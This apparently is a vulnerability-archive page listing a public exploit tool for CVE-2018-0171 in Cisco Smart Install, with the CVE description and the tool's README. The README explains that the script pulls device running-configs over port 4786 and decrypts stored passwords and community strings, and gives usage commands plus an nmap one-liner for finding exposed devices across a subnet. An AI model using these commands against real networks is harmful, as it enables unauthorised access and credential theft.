Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2018-0171 PoC — Cisco IOS Software和IOS XE Software 输入验证错误漏洞

Source
https://github.com/AlrikRr/Cisco-Smart-Exploit
Associated Vulnerability
Title:Cisco IOS Software和IOS XE Software 输入验证错误漏洞 (CVE-2018-0171)
Description:A vulnerability in the Smart Install feature of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to trigger a reload of an affected device, resulting in a denial of service (DoS) condition, or to execute arbitrary code on an affected device. The vulnerability is due to improper validation of packet data. An attacker could exploit this vulnerability by sending a crafted Smart Install message to an affected device on TCP port 4786. A successful exploit could allow the attacker to cause a buffer overflow on the affected device, which could have the following impacts: Triggering a reload of the device, Allowing the attacker to execute arbitrary code on the device, Causing an indefinite loop on the affected device that triggers a watchdog crash. Cisco Bug IDs: CSCvg76186.
Description
Cisco SmartInstall Exploit [CVE-2018-0171]
Readme
# Cisco-Smart-Exploit
Cisco SmartInstall Exploit **CVE-2018-0171**

> Inspired from [C. Papathanasiou PoC](https://github.com/ChristianPapathanasiou/CiscoSmartInstallExploit)

This Python 3 script uses port 4786 on a Cisco device running SmartInstall to exploit **CVE-2018-0171**. With the use of this exploit, an attacker can craft a payload, send it to the Cisco device, and then extract the contents of the `running-config` file.

The Cisco Smart Exploit script can:  
- **Extract** the running-config file
- **Parse** and **decrypt** secret 7 hashes
- **Parse** plain text passwords
- **Parse** all the **Community String**

![Usage Script](assets/screen.png)

## Requirements

Here is the list of requirements to use the script:

- `tftpy==0.8.2`
- `c7decrypt` for secret 7 decryption
    - `gem install c7decrypt`

## Usage

```bash
 __     __   __   __      __              __  ___     ___      __        __    ___
/  ` | /__` /  ` /  \    /__`  |\/|  /\  |__)  |     |__  \_/ |__) |    /  \ |  |
\__, | .__/ \__, \__/    .__/  |  | /~~\ |  \  |     |___ / \ |    |___ \__/ |  |
by @AlrikRr

usage: cisco-se.py [-h] (-i IP | -f FILE | -c CONFIG)

optional arguments:
  -h, --help  show this help message and exit
  -i IP       Single IP Address
  -f FILE     File that contains IP list
  -c CONFIG   running-config File standalone
```
Examples :
```bash
python3 cisco-se.py -i 192.168.10.1

python3 cisco-se.py -f ip_list.txt

python3 cisco-se.py -c running-config.txt
```

### Nmap Output IP list

For the `-f FILE` option, here is an example using nmap:  

```bash
nmap -p 4786 10.20.30.0/24 --open -Pn -oG - | awk '/Up$/{print $2}' > ip_list.txt
```

## Todo List
- [ ] Handle the timeout error for some ips during `client.download()`
File Snapshot

 [4.0K]  /data/pocs/2af71cb39e58b352e61c3acd67dceaceb429016d
├── [4.0K]  assets
│   └── [ 88K]  screen.png
├── [7.0K]  cisco-se.py
├── [1.0K]  LICENSE
├── [1.7K]  README.md
└── [  12]  requirements.txt

1 directory, 5 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →